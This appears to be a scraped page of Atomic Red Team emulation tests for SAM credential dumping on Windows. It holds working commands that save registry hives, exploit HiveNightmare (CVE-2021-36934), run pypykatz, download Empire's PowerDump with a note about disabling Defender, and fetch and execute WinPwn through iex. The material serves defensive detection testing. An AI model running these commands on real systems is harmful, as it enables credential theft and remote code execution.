Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with thenet user
command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, the SAM can be extracted from the Registry with Reg: *reg save HKLM\sam sam
*reg save HKLM\system system
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7) Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,000+.
Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Atomic Test #5 - dump volume shadow copy hives with certutil
Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
Supported Platforms: Windows
auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
1
command_prompt
! Elevation Required (e.g. root or admin)reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
Parses registry hives to obtain stored credentials.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
Supported Platforms: Windows
auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
| Name | Description | Type | Default Value | |——|————-|——|—————| | venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002|
1
command_prompt
! Elevation Required (e.g. root or admin)"#{venv_path}\Scripts\pypykatz" live lsa
1
powershell
!1
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
1
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
1
py -m venv "#{venv_path}"
1
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
1
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
Supported Platforms: Windows
auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
| Name | Description | Type | Default Value | |——|————-|——|—————| | file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM| | file_name | Name of the copied file | string | SAM| | copy_dest | Destination of the copied file | string | %temp%|
1
command_prompt
! Elevation Required (e.g. root or admin)esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
del #{copy_dest}\#{file_name} >nul 2>&1
Executes a hashdump by reading the hashes from the registry.
Supported Platforms: Windows
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
1
powershell
! Elevation Required (e.g. root or admin)1
2
3
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
1
powershell
!1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as “HiveNightmare” or “SeriousSAM”. This can be done with a non-admin user account. CVE-2021-36934
Supported Platforms: Windows
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
| Name | Description | Type | Default Value | |——|————-|——|—————| | target_hive | Hive you wish to dump | string | SAM| | limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|
1
command_prompt
!for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
Dump hives from volume shadow copies with System.IO.File. CVE-2021-36934
Supported Platforms: Windows
auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
| Name | Description | Type | Default Value | |——|————-|——|—————| | target_hive | Hive you wish to dump | string | SAM| | limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|
1
powershell
!1
2
3
4
1..#{limit} | % {
try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
1
2
3
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
1
powershell
!1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
Supported Platforms: Windows
auto_generated_guid: 21df41be-cdd8-4695-a650-c3981113aa3c
1
command_prompt
! Elevation Required (e.g. root or admin)reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul